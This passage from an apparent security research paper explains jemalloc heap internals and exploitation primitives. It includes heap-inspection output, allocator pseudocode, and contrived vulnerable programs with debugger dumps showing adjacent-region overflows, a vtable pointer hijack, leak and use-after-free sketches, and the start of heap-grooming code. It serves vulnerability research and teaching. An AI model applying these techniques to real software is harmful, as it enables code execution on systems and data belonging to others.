[jemalloc] [arena #00] [bin #15] [region size: 0x0140]
|
|
[current run at: 0xa382c000]
|
|
[jemalloc] [arena #00] [bin #16] [region size: 0x0150]
|
|
[current run at: 0xa39da000]
|
|
[jemalloc] [arena #00] [bin #17] [region size: 0x0160]
|
|
[current run at: 0xa56ee000]
|
|
[jemalloc] [arena #00] [bin #18] [region size: 0x0170]
|
|
[current run at: 0xa3849000]
|
|
[jemalloc] [arena #00] [bin #19] [region size: 0x0180]
|
|
[current run at: 0xa3a21000]
|
|
[jemalloc] [arena #00] [bin #20] [region size: 0x01f0]
|
|
[current run at: 0xafc51000]
|
|
[jemalloc] [arena #00] [bin #21] [region size: 0x0200]
|
|
[current run at: 0xa3751000]
|
|
[jemalloc] [arena #00] [bin #22] [region size: 0x0400]
|
|
[current run at: 0xa371d000]
|
|
[jemalloc] [arena #00] [bin #23] [region size: 0x0800]
|
|
[current run at: 0xa370d000]
|
|
|
|
[jemalloc] [run 0xa3347000] [from 0xa3347000 to 0xa3348000L]
|
|
[jemalloc] [run 0xa371d000] [from 0xa371d000 to 0xa3725000L]
|
|
[jemalloc] [run 0xa3321000] [from 0xa3321000 to 0xa3323000L]
|
|
[jemalloc] [run 0xa334a000] [from 0xa334a000 to 0xa334b000L]
|
|
[jemalloc] [run 0xa370d000] [from 0xa370d000 to 0xa3715000L]
|
|
[jemalloc] [run 0xa3709000] [from 0xa3709000 to 0xa370d000L]
|
|
[jemalloc] [run 0xa37c8000] [from 0xa37c8000 to 0xa37c9000L]
|
|
[jemalloc] [run 0xa5a9b000] [from 0xa5a9b000 to 0xa5a9f000L]
|
|
[jemalloc] [run 0xa3a21000] [from 0xa3a21000 to 0xa3a27000L]
|
|
[jemalloc] [run 0xa382c000] [from 0xa382c000 to 0xa3831000L]
|
|
[jemalloc] [run 0xa3701000] [from 0xa3701000 to 0xa3702000L]
|
|
[jemalloc] [run 0xa57c7000] [from 0xa57c7000 to 0xa57ca000L]
|
|
[jemalloc] [run 0xa56ee000] [from 0xa56ee000 to 0xa56f3000L]
|
|
[jemalloc] [run 0xa39da000] [from 0xa39da000 to 0xa39df000L]
|
|
[jemalloc] [run 0xa37e9000] [from 0xa37e9000 to 0xa37ed000L]
|
|
[jemalloc] [run 0xa3810000] [from 0xa3810000 to 0xa3812000L]
|
|
[jemalloc] [run 0xa3751000] [from 0xa3751000 to 0xa3759000L]
|
|
[jemalloc] [run 0xafc51000] [from 0xafc51000 to 0xafc58000L]
|
|
[jemalloc] [run 0xa334d000] [from 0xa334d000 to 0xa334e000L]
|
|
[jemalloc] [run 0xa372c000] [from 0xa372c000 to 0xa372d000L]
|
|
[jemalloc] [run 0xa52d9000] [from 0xa52d9000 to 0xa52da000L]
|
|
[jemalloc] [run 0xa56ea000] [from 0xa56ea000 to 0xa56ee000L]
|
|
[jemalloc] [run 0xa3732000] [from 0xa3732000 to 0xa3733000L]
|
|
[jemalloc] [run 0xa3849000] [from 0xa3849000 to 0xa384e000L]
|
|
|
|
|
|
There is also preliminary support for Mac OS X (x86_64), tested on Lion
|
|
10.7.3 with Firefox 11.0. Also, note that Apple's gdb does not have Python
|
|
scripting support, so the following was obtained with a custom-compiled
|
|
gdb:
|
|
|
|
|
|
$ open firefox-11.0.app
|
|
|
|
$ gdb -nx -x ./gdbinit -p 837
|
|
|
|
...
|
|
Attaching to process 837
|
|
[New Thread 0x2003 of process 837]
|
|
[New Thread 0x2103 of process 837]
|
|
[New Thread 0x2203 of process 837]
|
|
[New Thread 0x2303 of process 837]
|
|
[New Thread 0x2403 of process 837]
|
|
[New Thread 0x2503 of process 837]
|
|
[New Thread 0x2603 of process 837]
|
|
[New Thread 0x2703 of process 837]
|
|
[New Thread 0x2803 of process 837]
|
|
[New Thread 0x2903 of process 837]
|
|
[New Thread 0x2a03 of process 837]
|
|
[New Thread 0x2b03 of process 837]
|
|
[New Thread 0x2c03 of process 837]
|
|
[New Thread 0x2d03 of process 837]
|
|
[New Thread 0x2e03 of process 837]
|
|
Reading symbols from
|
|
/dbg/firefox-11.0.app/Contents/MacOS/firefox...done
|
|
Reading symbols from
|
|
/dbg/firefox-11.0.app/Contents/MacOS/firefox.dSYM/
|
|
Contents/Resources/DWARF/firefox...done.
|
|
0x00007fff8636b67a in ?? () from /usr/lib/system/libsystem_kernel.dylib
|
|
(gdb) source unmask_jemalloc.py
|
|
(gdb) unmask_jemalloc
|
|
|
|
[jemalloc] [number of arenas: 1]
|
|
[jemalloc] [number of bins: 35]
|
|
[jemalloc] [no magazines/thread caches detected]
|
|
|
|
[jemalloc] [arena #00] [bin #00] [region size: 0x0008]
|
|
[current run at: 0x108fe0000]
|
|
[jemalloc] [arena #00] [bin #01] [region size: 0x0010]
|
|
[current run at: 0x1003f5000]
|
|
[jemalloc] [arena #00] [bin #02] [region size: 0x0020]
|
|
[current run at: 0x1003bc000]
|
|
[jemalloc] [arena #00] [bin #03] [region size: 0x0030]
|
|
[current run at: 0x1003d7000]
|
|
[jemalloc] [arena #00] [bin #04] [region size: 0x0040]
|
|
[current run at: 0x1054c6000]
|
|
[jemalloc] [arena #00] [bin #05] [region size: 0x0050]
|
|
[current run at: 0x103652000]
|
|
[jemalloc] [arena #00] [bin #06] [region size: 0x0060]
|
|
[current run at: 0x110c9c000]
|
|
[jemalloc] [arena #00] [bin #07] [region size: 0x0070]
|
|
[current run at: 0x106bef000]
|
|
[jemalloc] [arena #00] [bin #08] [region size: 0x0080]
|
|
[current run at: 0x10693b000]
|
|
[jemalloc] [arena #00] [bin #09] [region size: 0x0090]
|
|
[current run at: 0x10692e000]
|
|
[jemalloc] [arena #00] [bin #10] [region size: 0x00a0]
|
|
[current run at: 0x106743000]
|
|
[jemalloc] [arena #00] [bin #11] [region size: 0x00b0]
|
|
[current run at: 0x109525000]
|
|
[jemalloc] [arena #00] [bin #12] [region size: 0x00c0]
|
|
[current run at: 0x1127c2000]
|
|
[jemalloc] [arena #00] [bin #13] [region size: 0x00d0]
|
|
[current run at: 0x106797000]
|
|
[jemalloc] [arena #00] [bin #14] [region size: 0x00e0]
|
|
[current run at: 0x109296000]
|
|
[jemalloc] [arena #00] [bin #15] [region size: 0x00f0]
|
|
[current run at: 0x110aa9000]
|
|
[jemalloc] [arena #00] [bin #16] [region size: 0x0100]
|
|
[current run at: 0x106c70000]
|
|
[jemalloc] [arena #00] [bin #17] [region size: 0x0110]
|
|
[current run at: 0x109556000]
|
|
[jemalloc] [arena #00] [bin #18] [region size: 0x0120]
|
|
[current run at: 0x1092bf000]
|
|
[jemalloc] [arena #00] [bin #19] [region size: 0x0130]
|
|
[current run at: 0x1092a2000]
|
|
[jemalloc] [arena #00] [bin #20] [region size: 0x0140]
|
|
[current run at: 0x10036a000]
|
|
[jemalloc] [arena #00] [bin #21] [region size: 0x0150]
|
|
[current run at: 0x100353000]
|
|
[jemalloc] [arena #00] [bin #22] [region size: 0x0160]
|
|
[current run at: 0x1093d3000]
|
|
[jemalloc] [arena #00] [bin #23] [region size: 0x0170]
|
|
[current run at: 0x10f024000]
|
|
[jemalloc] [arena #00] [bin #24] [region size: 0x0180]
|
|
[current run at: 0x106b58000]
|
|
[jemalloc] [arena #00] [bin #25] [region size: 0x0190]
|
|
[current run at: 0x10f002000]
|
|
[jemalloc] [arena #00] [bin #26] [region size: 0x01a0]
|
|
[current run at: 0x10f071000]
|
|
[jemalloc] [arena #00] [bin #27] [region size: 0x01b0]
|
|
[current run at: 0x109139000]
|
|
[jemalloc] [arena #00] [bin #28] [region size: 0x01c0]
|
|
[current run at: 0x1091c6000]
|
|
[jemalloc] [arena #00] [bin #29] [region size: 0x01d0]
|
|
[current run at: 0x10032a000]
|
|
[jemalloc] [arena #00] [bin #30] [region size: 0x01e0]
|
|
[current run at: 0x1054f9000]
|
|
[jemalloc] [arena #00] [bin #31] [region size: 0x01f0]
|
|
[current run at: 0x10034c000]
|
|
[jemalloc] [arena #00] [bin #32] [region size: 0x0200]
|
|
[current run at: 0x106739000]
|
|
[jemalloc] [arena #00] [bin #33] [region size: 0x0400]
|
|
[current run at: 0x106c68000]
|
|
[jemalloc] [arena #00] [bin #34] [region size: 0x0800]
|
|
[current run at: 0x10367e000]
|
|
|
|
|
|
We did our best to test unmask_jemalloc.py on all jemalloc variants,
|
|
however there are probably some bugs left. Feel free to test it and send us
|
|
patches. The development of unmask_jemalloc.py will continue at [UJEM].
|
|
|
|
|
|
----[ 2.2 - Algorithms
|
|
|
|
In this section we present pseudocode that describes the allocation and
|
|
deallocation algorithms implemented by jemalloc. We start with malloc():
|
|
|
|
|
|
MALLOC(size):
|
|
IF size CAN BE SERVICED BY AN ARENA:
|
|
IF size IS SMALL OR MEDIUM:
|
|
bin = get_bin_for_size(size)
|
|
|
|
IF bin->runcur EXISTS AND NOT FULL:
|
|
run = bin->runcur
|
|
ELSE:
|
|
run = lookup_or_allocate_nonfull_run()
|
|
bin->runcur = run
|
|
|
|
bit = get_first_set_bit(run->regs_mask)
|
|
region = get_region(run, bit)
|
|
|
|
ELIF size IS LARGE:
|
|
region = allocate_new_run()
|
|
ELSE:
|
|
region = allocate_new_chunk()
|
|
RETURN region
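
The last two steps of the small/medium path translate the free bit back
into a user pointer using the run header (2.1.3) and the owning bin's
metadata (2.1.5); roughly (a sketch, not the actual jemalloc code):

/* sketch of get_region(): regions start reg0_offset bytes after the
 * run header and are reg_size bytes apart */
static void *get_region(arena_run_t *run, unsigned bit)
{
    arena_bin_t *bin = run->bin;

    return (char *)run + bin->reg0_offset + (size_t)bit * bin->reg_size;
}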
|
|
|
|
|
|
calloc() is as you would expect:
|
|
|
|
|
|
CALLOC(n, size):
|
|
RETURN MALLOC(n * size)
|
|
|
|
|
|
Finally, the pseudocode for free():
|
|
|
|
|
|
FREE(addr):
|
|
IF addr IS NOT EQUAL TO THE CHUNK IT BELONGS:
|
|
IF addr IS A SMALL ALLOCATION:
|
|
run = get_run_addr_belongs_to(addr);
|
|
bin = run->bin;
|
|
size = bin->reg_size;
|
|
element = get_element_index(addr, run, bin)
|
|
unset_bit(run->regs_mask[element])
|
|
|
|
ELSE: /* addr is a large allocation */
|
|
run = get_run_addr_belongs_to(addr)
|
|
chunk = get_chunk_run_belongs_to(run)
|
|
run_index = get_run_index(run, chunk)
|
|
mark_pages_of_run_as_free(run_index)
|
|
|
|
IF ALL THE PAGES OF chunk ARE MARKED AS FREE:
|
|
unmap_the_chunk_s_pages(chunk)
|
|
|
|
ELSE: /* this is a huge allocation */
|
|
unmap_the_huge_allocation_s_pages(addr)
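
For the small allocation path, get_element_index() is simply the inverse
of the region computation sketched after the MALLOC pseudocode above:

/* sketch of get_element_index(): recover the region index of 'addr'
 * inside 'run' so that its bit in regs_mask can be flipped back */
static unsigned get_element_index(void *addr, arena_run_t *run,
                                  arena_bin_t *bin)
{
    size_t diff = (size_t)((char *)addr -
                           ((char *)run + bin->reg0_offset));

    return (unsigned)(diff / bin->reg_size);
}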
|
|
|
|
|
|
--[ 3 - Exploitation tactics
|
|
|
|
In this section we analyze the exploitation tactics we have investigated
|
|
against jemalloc. Our goal is to provide the interested hackers with the
|
|
necessary knowledge and tools to develop exploits for jemalloc heap
|
|
corruption bugs.
|
|
|
|
We also try to approach jemalloc heap exploitation in an abstract way
|
|
initially, identifying 'exploitation primitives' and then continuing into
|
|
the specific required technical details. Chris Valasek and Ryan Smith have
|
|
explored the value of abstracting heap exploitation through primitives
|
|
[CVRS]. The main idea is that specific exploitation techniques eventually
|
|
become obsolete. Therefore it is important to approach exploitation
|
|
abstractly and to identify primitives applicable to new targets. We have
|
|
used this approach before, comparing FreeBSD and Linux kernel heap
|
|
exploitation [HAPF, APHN]. Regarding jemalloc, we analyze adjacent data
|
|
corruption, heap manipulation and metadata corruption exploitation
|
|
primitives.
|
|
|
|
|
|
----[ 3.1 - Adjacent region corruption
|
|
|
|
The main idea behind adjacent heap item corruptions is that you exploit the
|
|
fact that the heap manager places user allocations next to each other
|
|
contiguously without other data in between. In jemalloc regions of the same
|
|
size class are placed on the same bin. In the case that they are also
|
|
placed on the same run of the bin then there are no inline metadata between
|
|
them. In 3.2 we will see how we can force this, but for now let's assume
|
|
that new allocations of the same size class are placed in the same run.
|
|
|
|
Therefore, we can place a victim object/structure of our choosing in the
|
|
same run and next to the vulnerable object/structure we plan to overflow.
|
|
The only requirement is that the victim and vulnerable objects need to be
|
|
of a size that puts them in the same size class and therefore possibly in
|
|
the same run (again, see the next subsection on how to control this). Since
|
|
there are no metadata between the two regions, we can overflow from the
|
|
vulnerable region to the victim region we have chosen. Usually the victim
|
|
region is something that can help us achieve arbitrary code execution, for
|
|
example function pointers.
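
On a 32-bit target, a hypothetical victim of the 16-byte size class used
in the example below could be as simple as the following structure (it
is illustrative, not taken from a real application):

/* hypothetical 16-byte victim: if the vulnerable buffer occupies the
 * region right before it, the overflow reaches 'callback', which the
 * application later calls */
struct victim {
    int    state;
    void (*callback)(int);
    char   name[8];
};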
|
|
|
|
In the following contrived example consider that 'three' is your chosen
|
|
victim object and that the vulnerable object is 'two' (full code in file
|
|
test-adjacent.c):
|
|
|
|
|
|
char *one, *two, *three;
|
|
|
|
printf("[*] before overflowing\n");
|
|
|
|
one = malloc(0x10);
|
|
memset(one, 0x41, 0x10);
|
|
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
|
|
|
|
two = malloc(0x10);
|
|
memset(two, 0x42, 0x10);
|
|
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
|
|
|
|
three = malloc(0x10);
|
|
memset(three, 0x43, 0x10);
|
|
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
|
|
|
|
[3-1]
|
|
|
|
printf("[+] copying argv[1] to region two\n");
|
|
strcpy(two, argv[1]);
|
|
|
|
printf("[*] after overflowing\n");
|
|
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
|
|
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
|
|
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
|
|
|
|
[3-2]
|
|
|
|
free(one);
|
|
free(two);
|
|
free(three);
|
|
|
|
printf("[*] after freeing all regions\n");
|
|
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
|
|
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
|
|
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
|
|
|
|
[3-3]
|
|
|
|
|
|
The output (edited for readability):
|
|
|
|
|
|
$ ./test-adjacent `python -c 'print "X" * 30'`
|
|
[*] before overflowing
|
|
[+] region one: 0xb7003030: AAAAAAAAAAAAAAAA
|
|
[+] region two: 0xb7003040: BBBBBBBBBBBBBBBB
|
|
[+] region three: 0xb7003050: CCCCCCCCCCCCCCCC
|
|
[+] copying argv[1] to region two
|
|
[*] after overflowing
|
|
[+] region one: 0xb7003030:
|
|
AAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
|
[+] region two: 0xb7003040: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
|
[+] region three: 0xb7003050: XXXXXXXXXXXXXX
|
|
[*] after freeing all regions
|
|
[+] region one: 0xb7003030:
|
|
AAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
|
[+] region two: 0xb7003040: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
|
[+] region three: 0xb7003050: XXXXXXXXXXXXXX
|
|
|
|
|
|
Examining the above we can see that region 'one' is at 0xb7003030 and that
|
|
the following two allocations (regions 'two' and 'three') are in the same
|
|
run immediately after 'one' and all three next to each other without any
|
|
metadata in between them. After the overflow of 'two' with 30 'X's we can
|
|
see that region 'three' has been overwritten with 14 'X's (30 - 16 for the
|
|
size of region 'two').
|
|
|
|
In order to achieve a better understanding of the jemalloc memory layout
|
|
let's fire up gdb with three breakpoints at [3-1], [3-2] and [3-3].
|
|
|
|
At breakpoint [3-1]:
|
|
|
|
|
|
Breakpoint 1, 0x080486a9 in main ()
|
|
gdb $ print arenas[0].bins[2].runcur
|
|
$1 = (arena_run_t *) 0xb7003000
|
|
|
|
|
|
At 0xb7003000 is the current run of the bin bins[2] that manages the size
|
|
class 16 in the standalone jemalloc flavor that we have linked against.
|
|
Let's take a look at the run's contents:
|
|
|
|
|
|
gdb $ x/40x 0xb7003000
|
|
0xb7003000: 0xb78007ec 0x00000003 0x000000fa 0xfffffff8
|
|
0xb7003010: 0xffffffff 0xffffffff 0xffffffff 0xffffffff
|
|
0xb7003020: 0xffffffff 0xffffffff 0x1fffffff 0x000000ff
|
|
0xb7003030: 0x41414141 0x41414141 0x41414141 0x41414141
|
|
0xb7003040: 0x42424242 0x42424242 0x42424242 0x42424242
|
|
0xb7003050: 0x43434343 0x43434343 0x43434343 0x43434343
|
|
0xb7003060: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003070: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003080: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003090: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
|
|
After some initial metadata (the run's header which we will see in more
|
|
detail at 3.3.1) we have region 'one' at 0xb7003030 followed by regions
|
|
'two' and 'three', all of size 16 bytes. Again we can see that there are no
|
|
metadata between the regions. Continuing to breakpoint [3-2] and examining
|
|
again the contents of the run:
|
|
|
|
|
|
Breakpoint 2, 0x08048724 in main ()
|
|
gdb $ x/40x 0xb7003000
|
|
0xb7003000: 0xb78007ec 0x00000003 0x000000fa 0xfffffff8
|
|
0xb7003010: 0xffffffff 0xffffffff 0xffffffff 0xffffffff
|
|
0xb7003020: 0xffffffff 0xffffffff 0x1fffffff 0x000000ff
|
|
0xb7003030: 0x41414141 0x41414141 0x41414141 0x41414141
|
|
0xb7003040: 0x58585858 0x58585858 0x58585858 0x58585858
|
|
0xb7003050: 0x58585858 0x58585858 0x58585858 0x43005858
|
|
0xb7003060: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003070: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003080: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003090: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
|
|
We can see that our 30 'X's (0x58) have overwritten the complete 16 bytes
|
|
of region 'two' at 0xb7003040 and continued for 15 bytes (14 plus a NULL
|
|
from strcpy(3)) in region 'three' at 0xb7003050. From this memory dump it
|
|
should be clear why the printf(3) call of region 'one' after the overflow
|
|
continues to print all 46 bytes (16 from region 'one' plus 30 from the
|
|
overflow) up to the NULL placed by the strcpy(3) call. As it has been
|
|
demonstrated by Peter Vreugdenhil in the context of Internet Explorer heap
|
|
overflows [PV10], this can lead to information leaks from the region that
|
|
is adjacent to the region with the string whose terminating NULL has been
|
|
overwritten. You just need to read back the string and you will get all
|
|
data up to the first encountered NULL.
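
The following contrived sketch illustrates the idea; it assumes, as in the
example above, that the two 16 byte regions end up adjacent in the same run
(the names are purely illustrative):

char *a, *secret;

a = malloc(16);
secret = malloc(16);            /* assumed to land right after 'a' */
strcpy(secret, "SESSION-KEY");

/* Vulnerable copy: fills all 16 bytes of 'a', leaving no terminating
 * NULL inside the region itself. */
memset(a, 'A', 16);

/* Reading 'a' back now also returns the contents of 'secret', since
 * the first NULL byte encountered lives in the adjacent region. */
printf("leaked: %s\n", a);
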
|
|
|
|
At breakpoint [3-3] after the deallocation of all three regions:
|
|
|
|
|
|
Breakpoint 3, 0x080487ab in main ()
|
|
gdb $ x/40x 0xb7003000
|
|
0xb7003000: 0xb78007ec 0x00000003 0x000000fd 0xffffffff
|
|
0xb7003010: 0xffffffff 0xffffffff 0xffffffff 0xffffffff
|
|
0xb7003020: 0xffffffff 0xffffffff 0x1fffffff 0x000000ff
|
|
0xb7003030: 0x41414141 0x41414141 0x41414141 0x41414141
|
|
0xb7003040: 0x58585858 0x58585858 0x58585858 0x58585858
|
|
0xb7003050: 0x58585858 0x58585858 0x58585858 0x43005858
|
|
0xb7003060: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003070: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003080: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003090: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
|
|
We can see that jemalloc does not clear the freed regions. This behavior of
|
|
leaving stale data in regions that have been freed and can be allocated
|
|
again can lead to easier exploitation of use-after-free bugs (see next
|
|
section).
|
|
|
|
To explore the adjacent region corruption primitive further in the context
|
|
of jemalloc, we will now look at C++ and virtual function pointers (VPTRs).
|
|
We will only focus on jemalloc-related details; for more general
|
|
information the interested reader should see rix's Phrack paper (the
|
|
principles of which are still applicable) [VPTR]. We begin with a C++
|
|
example that is based on rix's bo2.cpp (file vuln-vptr.cpp in the code
|
|
archive):
|
|
|
|
|
|
class base
|
|
{
|
|
private:
|
|
|
|
char buf[32];
|
|
|
|
public:
|
|
|
|
void
|
|
copy(const char *str)
|
|
{
|
|
strcpy(buf, str);
|
|
}
|
|
|
|
virtual void
|
|
print(void)
|
|
{
|
|
printf("buf: 0x%08x: %s\n", buf, buf);
|
|
}
|
|
};
|
|
|
|
class derived_a : public base
|
|
{
|
|
public:
|
|
|
|
void
|
|
print(void)
|
|
{
|
|
printf("[+] derived_a: ");
|
|
base::print();
|
|
}
|
|
};
|
|
|
|
class derived_b : public base
|
|
{
|
|
public:
|
|
|
|
void
|
|
print(void)
|
|
{
|
|
printf("[+] derived_b: ");
|
|
base::print();
|
|
}
|
|
};
|
|
|
|
int
|
|
main(int argc, char *argv[])
|
|
{
|
|
base *obj_a;
|
|
base *obj_b;
|
|
|
|
obj_a = new derived_a;
|
|
obj_b = new derived_b;
|
|
|
|
printf("[+] obj_a:\t0x%x\n", (unsigned int)obj_a);
|
|
printf("[+] obj_b:\t0x%x\n", (unsigned int)obj_b);
|
|
|
|
if(argc == 3)
|
|
{
|
|
printf("[+] overflowing from obj_a into obj_b\n");
|
|
obj_a->copy(argv[1]);
|
|
|
|
obj_b->copy(argv[2]);
|
|
|
|
obj_a->print();
|
|
obj_b->print();
|
|
|
|
return 0;
|
|
}
|
|
|
|
|
|
We have a base class with a virtual function, 'print(void)', and two
|
|
derived classes that overload this virtual function. Then in main, we use
|
|
'new' to create two new objects, one from each of the derived classes.
|
|
Subsequently we overflow the 'buf' buffer of 'obj_a' with 'argv[1]'.
|
|
|
|
Let's explore with gdb:
|
|
|
|
|
|
$ gdb vuln-vptr
|
|
...
|
|
gdb $ r `python -c 'print "A" * 48'` `python -c 'print "B" * 10'`
|
|
...
|
|
0x804862f <main(int, char**)+15>: movl $0x24,(%esp)
|
|
0x8048636 <main(int, char**)+22>: call 0x80485fc <_Znwj@plt>
|
|
0x804863b <main(int, char**)+27>: movl $0x80489e0,(%eax)
|
|
gdb $ print $eax
|
|
$13 = 0xb7c01040
|
|
|
|
|
|
At 0x8048636 we can see the first 'new' call which takes as a parameter the
|
|
size of the object to create, that is 0x24 or 36 bytes. C++ will of course
|
|
use jemalloc to allocate the required amount of memory for this new object.
|
|
After the call instruction, EAX has the address of the allocated region
|
|
(0xb7c01040) and at 0x804863b the value 0x80489e0 is moved there. This is
|
|
the VPTR of 'obj_a', i.e. the pointer to its vtable whose first entry is
'print(void)':
|
|
|
|
|
|
gdb $ x/x *0x080489e0
|
|
0x80487d0 <derived_a::print()>: 0xc71cec83
|
|
|
|
|
|
Now it must be clear why even though the declared buffer is 32 bytes long,
|
|
there are 36 bytes allocated for the object. Exactly the same as above
|
|
happens with the second 'new' call, but this time the VPTR is that of
|
|
'obj_b' (which is at 0xb7c01070):
|
|
|
|
|
|
0x8048643 <main(int, char**)+35>: movl $0x24,(%esp)
|
|
0x804864a <main(int, char**)+42>: call 0x80485fc <_Znwj@plt>
|
|
0x804864f <main(int, char**)+47>: movl $0x80489f0,(%eax)
|
|
gdb $ x/x *0x080489f0
|
|
0x8048800 <derived_b::print()>: 0xc71cec83
|
|
gdb $ print $eax
|
|
$14 = 0xb7c01070
|
|
|
|
|
|
At this point, let's explore jemalloc's internals:
|
|
|
|
|
|
gdb $ print arenas[0].bins[5].runcur
|
|
$8 = (arena_run_t *) 0xb7c01000
|
|
gdb $ print arenas[0].bins[5].reg_size
|
|
$9 = 0x30
|
|
gdb $ print arenas[0].bins[4].reg_size
|
|
$10 = 0x20
|
|
gdb $ x/40x 0xb7c01000
|
|
0xb7c01000: 0xb7fd315c 0x00000000 0x00000052 0xfffffffc
|
|
0xb7c01010: 0xffffffff 0x000fffff 0x00000000 0x00000000
|
|
0xb7c01020: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01030: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01040: 0x080489e0 0x00000000 0x00000000 0x00000000
|
|
0xb7c01050: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01060: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01070: 0x080489f0 0x00000000 0x00000000 0x00000000
|
|
0xb7c01080: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01090: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
|
|
Our run is at 0xb7c01000 and the bin is bin[5] which handles regions of
|
|
size 0x30 (48 in decimal). Since our objects are of size 36 bytes they
|
|
don't fit in the previous bin, i.e. bin[4], of size 0x20 (32). We can see
|
|
'obj_a' at 0xb7c01040 with its VPTR (0x080489e0) and 'obj_b' at 0xb7c01070
|
|
with its own VPTR (0x080489f0).
|
|
|
|
Our next breakpoint is after the overflow of 'obj_a' into 'obj_b' and just
|
|
before the first call of 'print()'. Our run now looks like the following:
|
|
|
|
|
|
gdb $ x/40x 0xb7c01000
|
|
0xb7c01000: 0xb7fd315c 0x00000000 0x00000052 0xfffffffc
|
|
0xb7c01010: 0xffffffff 0x000fffff 0x00000000 0x00000000
|
|
0xb7c01020: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01030: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01040: 0x080489e0 0x41414141 0x41414141 0x41414141
|
|
0xb7c01050: 0x41414141 0x41414141 0x41414141 0x41414141
|
|
0xb7c01060: 0x41414141 0x41414141 0x41414141 0x41414141
|
|
0xb7c01070: 0x41414141 0x42424242 0x42424242 0x00004242
|
|
0xb7c01080: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01090: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
gdb $ x/i $eip
|
|
0x80486d1 <main(int, char**)+177>: call *(%eax)
|
|
gdb $ print $eax
|
|
$15 = 0x80489e0
|
|
|
|
|
|
At 0x080486d1 is the call of 'print()' of 'obj_a'. At 0xb7c01070 we can see
|
|
that we have overwritten the VPTR of 'obj_b' that was in an adjacent region
|
|
to 'obj_a'. Finally, at the call of 'print()' by 'obj_b':
|
|
|
|
|
|
gdb $ x/i $eip
|
|
=> 0x80486d8 <main(int, char**)+184>: call *(%eax)
|
|
gdb $ print $eax
|
|
$16 = 0x41414141
|
|
|
|
|
|
----[ 3.2 - Heap manipulation
|
|
|
|
In order to be able to arrange the jemalloc heap in a predictable state we
|
|
need to understand the allocator's behavior and use heap manipulation
|
|
tactics to influence it to our advantage. In the context of browsers, heap
|
|
manipulation tactics are usually referred to as 'Heap Feng Shui' after
|
|
Alexander Sotirov's work [FENG].
|
|
|
|
By 'predictable state' we mean that the heap must be arranged as reliably
|
|
as possible in a way that we can position data where we want. This enables
|
|
us to use the tactic of corrupting adjacent regions of the previous
|
|
paragraph, but also to exploit use-after-free bugs. In use-after-free
|
|
bugs a memory region is allocated, used, freed and then used again due
|
|
to a bug. In such a case if we know the region's size we can manipulate
|
|
the heap to place data of our own choosing in the freed region's memory
|
|
slot on its run before it is used again. Upon its subsequent incorrect use
|
|
the region now has our data that can help us hijack the flow of execution.
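
A minimal sketch of such a use-after-free follows; the 'obj' structure and
'legitimate_handler' are hypothetical, and we assume the attacker-controlled
allocation is of the same size class (16 bytes on the 32-bit systems used
here) so that it reuses the freed slot:

struct obj {
        void (*handler)(void);  /* 4 bytes                          */
        char name[12];          /* pads to the 16 byte size class   */
};

struct obj *victim;
char *evil;

victim = malloc(sizeof(struct obj));
victim->handler = legitimate_handler;   /* some existing function */

free(victim);                           /* slot goes back to its run */

/* Attacker-controlled allocation of the same size class; with the heap
 * arranged as described above it lands on the slot just freed. */
evil = malloc(sizeof(struct obj));
memset(evil, 0x41, sizeof(struct obj));

victim->handler();                      /* use-after-free: calls 0x41414141 */
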
|
|
|
|
To explore jemalloc's behavior and manipulate it into a predictable
|
|
state we use an algorithm similar to the one presented in [HOEJ]. Since
|
|
in the general case we cannot know beforehand the state of the runs of
|
|
the size class we are interested in, we perform many allocations of this
|
|
size hoping to cover the holes (i.e. free regions) in the existing runs
|
|
and get a fresh run. Hopefully the next series of allocations we will
|
|
perform will be on this fresh run and therefore will be sequential. As
|
|
we have seen, sequential allocations on a largely empty run are also
|
|
contiguous. Next, we perform such a series of allocations controlled by
|
|
us. In the case we are trying to use the adjacent regions corruption
|
|
tactic, these allocations are of the victim object/structure we have
|
|
chosen to help us gain code execution when corrupted.
|
|
|
|
The following step is to deallocate every second region in this last series
|
|
of controlled victim allocations. This will create holes in between the
|
|
victim objects/structures on the run of the size class we are trying to
|
|
manipulate. Finally, we trigger the heap overflow bug forcing, due to the
|
|
state we have arranged, jemalloc to place the vulnerable objects in holes
|
|
on the target run overflowing into the victim objects.
|
|
|
|
Let's demonstrate the above discussion with an example (file test-holes.c
|
|
in the code archive):
|
|
|
|
|
|
#define TSIZE 0x10 /* target size class */
|
|
#define NALLOC 500 /* number of allocations */
|
|
